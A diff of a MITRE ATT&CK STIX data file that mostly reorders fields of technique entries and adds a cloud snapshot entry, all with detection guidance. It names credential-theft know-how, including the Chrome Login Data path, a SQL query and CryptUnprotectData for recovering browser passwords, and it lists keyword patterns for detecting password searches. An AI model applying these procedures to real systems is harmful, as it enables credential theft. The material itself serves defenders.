+ "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-19T14:45:59.618Z",
+ "created": "2020-06-09T15:33:13.563Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)",
+ "x_mitre_data_sources": [
+ "GCP audit logs",
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
+ },
+ {
+ "created": "2020-01-10T16:03:18.865Z",
+ "modified": "2020-03-25T22:32:16.537Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
+ "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ",
+ "name": "Create or Modify System Process",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5128,26 +5387,6 @@
"source_name": "OSX Malware Detection"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Create or Modify System Process",
- "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ",
- "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T22:32:16.537Z",
- "created": "2020-01-10T16:03:18.865Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -5262,16 +5501,6 @@
],
"modified": "2020-03-24T21:29:13.565Z",
"created": "2020-02-11T19:01:15.930Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
"x_mitre_data_sources": [
"Windows event logs",
"Process monitoring",
@@ -5279,6 +5508,16 @@
"DLL monitoring",
"Binary file metadata",
"API monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -5310,6 +5549,20 @@
],
"modified": "2020-03-29T20:35:36.694Z",
"created": "2020-02-11T18:39:59.959Z",
+ "x_mitre_contributors": [
+ "Diogo Fernandes",
+ "Anastasios Pingios"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5320,23 +5573,18 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
- ],
- "x_mitre_contributors": [
- "Diogo Fernandes",
- "Anastasios Pingios"
]
},
{
+ "created": "2020-02-04T12:52:13.006Z",
+ "modified": "2020-03-25T18:30:10.630Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc",
"description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)",
"name": "Credentials In Files",
@@ -5371,33 +5619,6 @@
"description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T18:30:10.630Z",
- "created": "2020-02-04T12:52:13.006Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_system_requirements": [
- "Access to files"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "File monitoring"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)"
- ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5405,9 +5626,43 @@
"AWS",
"GCP",
"Azure"
- ]
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "File monitoring"
+ ],
+ "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_system_requirements": [
+ "Access to files"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-11T18:48:28.456Z",
+ "modified": "2020-03-25T18:40:15.564Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
+ "name": "Credentials from Password Stores",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5415,22 +5670,6 @@
"url": "https://attack.mitre.org/techniques/T1555"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Credentials from Password Stores",
- "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
- "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T18:40:15.564Z",
- "created": "2020-02-11T18:48:28.456Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5491,6 +5730,22 @@
"created": "2019-06-17T19:34:51.855Z"
},
{
+ "created": "2020-02-12T18:57:36.041Z",
+ "modified": "2020-02-17T13:20:02.386Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData \u200eApril 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
+ "name": "Credentials from Web Browsers",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5523,22 +5778,6 @@
"description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Credentials from Web Browsers",
- "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData \u200eApril 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
- "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-02-17T13:20:02.386Z",
- "created": "2020-02-12T18:57:36.041Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5647,27 +5886,27 @@
],
"modified": "2020-02-07T20:49:18.834Z",
"created": "2020-02-04T12:58:40.678Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."
],
- "x_mitre_contributors": [
- "Sudhanshu Chauhan, @Sudhanshu_C"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Sudhanshu Chauhan, @Sudhanshu_C"
],
- "x_mitre_system_requirements": [
- "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -5701,21 +5940,21 @@
],
"modified": "2020-03-23T23:30:46.546Z",
"created": "2019-12-03T14:25:00.538Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
@@ -5738,6 +5977,9 @@
"created": "2017-05-31T21:31:10.314Z"
},
{
+ "created": "2017-05-31T21:30:31.197Z",
+ "modified": "2020-03-30T20:17:22.024Z",
+ "type": "attack-pattern",
"revoked": true,
"id": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
"name": "Custom Cryptographic Protocol",
@@ -5762,10 +6004,7 @@
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"source_name": "University of Birmingham C2"
}
- ],
- "type": "attack-pattern",
- "modified": "2020-03-30T20:17:22.024Z",
- "created": "2017-05-31T21:30:31.197Z"
+ ]
},
{
"external_references": [
@@ -5851,20 +6090,20 @@
],
"modified": "2020-03-24T20:46:23.547Z",
"created": "2020-02-11T18:45:34.293Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
"x_mitre_data_sources": [
"Windows event logs"
],
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -5918,6 +6157,30 @@
"created": "2017-05-31T21:30:40.604Z"
},
{
+ "created": "2020-03-13T18:11:08.357Z",
+ "modified": "2020-03-26T16:13:58.862Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
+ "name": "DLL Search Order Hijacking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -5960,30 +6223,6 @@
"description": "Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "DLL Search Order Hijacking",
- "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
- "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-26T16:13:58.862Z",
- "created": "2020-03-13T18:11:08.357Z",
"x_mitre_platforms": [
"Windows"
],
@@ -6076,22 +6315,22 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T16:23:21.010Z",
+ "modified": "2020-06-20T22:05:42.513Z",
"created": "2020-03-13T19:41:37.908Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
"x_mitre_data_sources": [
"Loaded DLLs",
"Process monitoring",
"Process use of network"
],
- "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -6133,11 +6372,12 @@
],
"modified": "2020-03-27T19:02:44.600Z",
"created": "2020-03-15T16:27:31.768Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Jan Petrov, Citi"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
"x_mitre_data_sources": [
"DNS records",
"Netflow/Enclave netflow",
@@ -6146,11 +6386,10 @@
"Netflow/Enclave netflow",
"Packet capture"
],
